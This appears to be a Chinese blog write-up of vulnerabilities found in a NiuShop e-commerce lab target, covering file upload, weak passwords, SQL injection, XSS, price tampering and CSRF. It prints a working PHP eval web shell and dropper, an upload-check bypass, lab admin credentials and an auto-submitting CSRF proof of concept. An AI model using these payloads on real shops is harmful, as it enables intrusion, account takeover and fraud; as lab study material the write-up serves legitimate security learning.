niushop开源商城靶场漏洞

文件上传漏洞

有很多地方都存在文件上传;有的地方是要校验,加一个GIF89a就可以绕过

先注册一个账号

来到个人信息修改个人头像

选择我们的马

复制代码
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php 
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>'); 
?>

在BP中进行抓包,改为1.php

右键图片在网页新建打开图片标签;就能获取路径

去蚁剑连接生成的h.php就行

弱口令

使用BP抓包

在用户名和密码位添加payload

payload设置;选择我们的字典

开始攻击

得出用户名密码

复制代码
#用户名
admin
#密码
admin1

成功登录

SQL注入漏洞

基于布尔时间盲注

第一个存在点

sqlmap跑出来的

第二个存在点

二次外带注入

XSS漏洞

存储型

1.后台-->设置-->基础设置-->商城第三方统计代码

来到首页就会弹窗

2.后台-->网站--->广告位

反射型

1.后台--微信--消息管理素材管理-->添加消息存储-->标题

0元购

在商品页面抓包

通过改变数量改变价格

在放行一次修改数量为0.00000001

一共修改两次

后面全部放行就OK了

CSRF漏洞

下载源码;制作修改用户信息链接

修改用户信息

BP抓包;制作SCRF

复制下来制作链接

复制代码
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="user&#95;name" value="bbbcdff" />
      <input type="hidden" name="real&#95;name" value="11wsdasa" />
      <input type="hidden" name="birthday" value="1970&#45;01&#45;01" />
      <input type="hidden" name="location" value="'onclick&#61;'alert&#40;1&#41;'" />
      <input type="hidden" name="user&#95;qq" value="2461" />
      <input type="hidden" name="act" value="act&#95;edit&#95;profile" />
      <input type="hidden" name="submit" value="ç&#161;&#174;è&#174;&#164;ä&#191;&#174;æ&#148;&#185;å&#159;ºæ&#156;&#172;ä&#191;&#161;æ&#129;&#175;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

用户在已登录的状态点击我们的链接

相关推荐
Dnelic-9 小时前
Android 5G NR 状态类型介绍
android·5g·telephony·connectivity·自学笔记·移动网络数据
吗喽对你问好10 小时前
Android UI 控件详解实践
android·ui
东风西巷14 小时前
X-plore File Manager v4.34.02 修改版:安卓设备上的全能文件管理器
android·网络·软件需求
yzpyzp14 小时前
Android 15中的16KB大页有何优势?
android
安卓开发者14 小时前
Android Room 持久化库:简化数据库操作
android·数据库
程序视点14 小时前
FadCam安卓后台录制神器:2025最全使用指南(开源/免费/息屏录制)
android
猿小蔡15 小时前
Android ADB命令之内存统计与分析
android
游戏开发爱好者816 小时前
没有 Mac,如何上架 iOS App?多项目复用与流程标准化实战分享
android·ios·小程序·https·uni-app·iphone·webview
你过来啊你16 小时前
Android开发中nfc协议分析
android
Auspemak-Derafru17 小时前
安卓上的迷之K_1171477665
android